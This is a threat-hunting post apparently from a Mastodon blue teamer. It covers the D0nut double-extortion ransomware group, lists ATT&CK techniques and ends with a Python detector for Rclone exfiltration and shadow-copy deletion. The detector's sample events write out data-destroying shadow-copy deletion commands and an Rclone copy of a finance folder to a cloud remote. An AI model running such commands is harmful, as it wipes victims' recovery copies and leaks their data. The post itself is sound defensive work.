ioc.exchange is one of the many independent Mastodon servers you can use to participate in the fediverse.

Just Another Blue Teamer

everyone!

As promised, the next installment of "Unveiling the Dark Side: A Deep Dive into Active Ransomware Families" from the NCC Group! This time they focus on the extortion group who "demand ransoms in return for not leaking stolen data" (extortion) and then apply the double-extortion tactic where they exfiltrate the data THEN encrypt it. To add insult to injury, they then demand ransom to decrypt AND to not leak the data. They use publicly available tools like to laterally move through the environment and Rclone to exfiltrate data. Plus, extra bonus points go to Ross Inman for the clever title! Enjoy and Happy Hunting!

D0nut encrypt me, I have a wife and no backups
research.nccgroup.com/2023/11/


Notable MITRE ATT&CK TTPs (credit again goes to the author):
TA0002 - Execution
T1569.002 - System Services: Service Execution (Both Cobalt Strike and PsExec)

TA0003 - Persistence
T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder

TA0004 - Privilege Escalation
T1055.002 - Process Injection: Portable Executable Injection

TA0005 - Defense Evasion
T1562.001 - Impair Defenses: Disable or Modify Tools

TA0008 - Lateral Movement
T1021.001 - Remote Services: Remote Desktop Protocol

TA0010 - Exfiltration
T1048.002 - Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

TA0040 - Impact
T1490 - Inhibit System Recovery
T1486 - Data Encrypted for Impact

Some Cyborg Security Community Edition Hunt Packages to help you start your hunt for this type of activity:

Potential Exfiltration - Common Rclone Arguments
hunter.cyborgsecurity.io/resea

Shadow Copies Deletion Using Operating Systems Utilities
hunter.cyborgsecurity.io/resea
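To show what those two hunts look like in practice, here is an added example (mine, not code from the NCC Group post or the Cyborg Security hunt packages) that scores process-creation events for Rclone bulk-transfer command lines and shadow-copy deletion via OS utilities. The sample events, the Rclone verb/flag lists and the utility names are my own assumptions; the key defensive point is that Rclone is matched on command-line shape, not image name, because the binary is routinely renamed.

```python
import re
import ntpath

# Constructed sample process-creation events (image path, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\vssadmin.exe", 'vssadmin.exe delete shadows /all /quiet'),
    ("C:\\Windows\\System32\\wbem\\WMIC.exe", 'wmic shadowcopy delete'),
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     'powershell.exe -c "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"'),
    ("C:\\Users\\bob\\AppData\\Local\\Temp\\svchost.exe",  # renamed rclone binary
     'svchost.exe copy C:\\Finance mega:drop --transfers 16 --config C:\\Temp\\r.conf -q'),
    ("C:\\Program Files\\rclone\\rclone.exe", 'rclone.exe lsd gdrive:'),
    ("C:\\Windows\\System32\\vssadmin.exe", 'vssadmin.exe list shadows'),
    ("C:\\Windows\\System32\\notepad.exe", 'notepad.exe notes.txt'),
]

# Assumed Rclone verbs/flags typical of bulk transfer jobs (my assumption, not the hunt package's list).
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
RCLONE_FLAGS = {"--transfers", "--config", "--no-check-certificate", "--ignore-existing",
                "--multi-thread-streams", "--max-age", "--bwlimit", "-q", "-P"}
SHADOW_UTILS = {"vssadmin.exe", "wmic.exe", "diskshadow.exe"}
REMOTE_RE = re.compile(r"^[\w-]{2,}:")  # rclone remote "name:path"; excludes drive letters "C:\"

def rclone_exfil(toks):
    """Match on command-line shape, not the image name: rclone is routinely renamed."""
    if len(toks) < 3 or toks[1] not in RCLONE_VERBS:
        return False
    has_remote = any(REMOTE_RE.match(t) for t in toks[2:])
    has_flag = any(t.split("=")[0] in RCLONE_FLAGS for t in toks[2:])
    return has_remote and has_flag

def shadow_copy_deletion(image, toks, cmdline):
    """Shadow copies removed through vssadmin/wmic/diskshadow or the WMI class from PowerShell."""
    exe = ntpath.basename(image).lower()
    if exe in SHADOW_UTILS:
        return "delete" in toks and any(t.startswith("shadow") for t in toks)
    if exe == "powershell.exe":
        return "win32_shadowcopy" in cmdline and "remove-wmiobject" in cmdline
    return False

def classify(image, cmdline):
    """Return the set of hunt tags that fire for one process-creation event."""
    low = cmdline.lower()
    toks = [t.strip('"') for t in low.split()]
    tags = set()
    if rclone_exfil(toks):
        tags.add("rclone_exfil")
    if shadow_copy_deletion(image, toks, low):
        tags.add("shadow_copy_deletion")
    return tags

def hunt(events):
    """Return (index, tags) for every event that matches at least one hunt."""
    hits = []
    for i, (img, cmd) in enumerate(events):
        tags = classify(img, cmd)
        if tags:
            hits.append((i, tags))
    return hits
```

Running `hunt(SAMPLE_EVENTS)` flags the three shadow-copy deletions and the renamed Rclone copy job, while the `rclone lsd` listing and `vssadmin list shadows` stay quiet.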
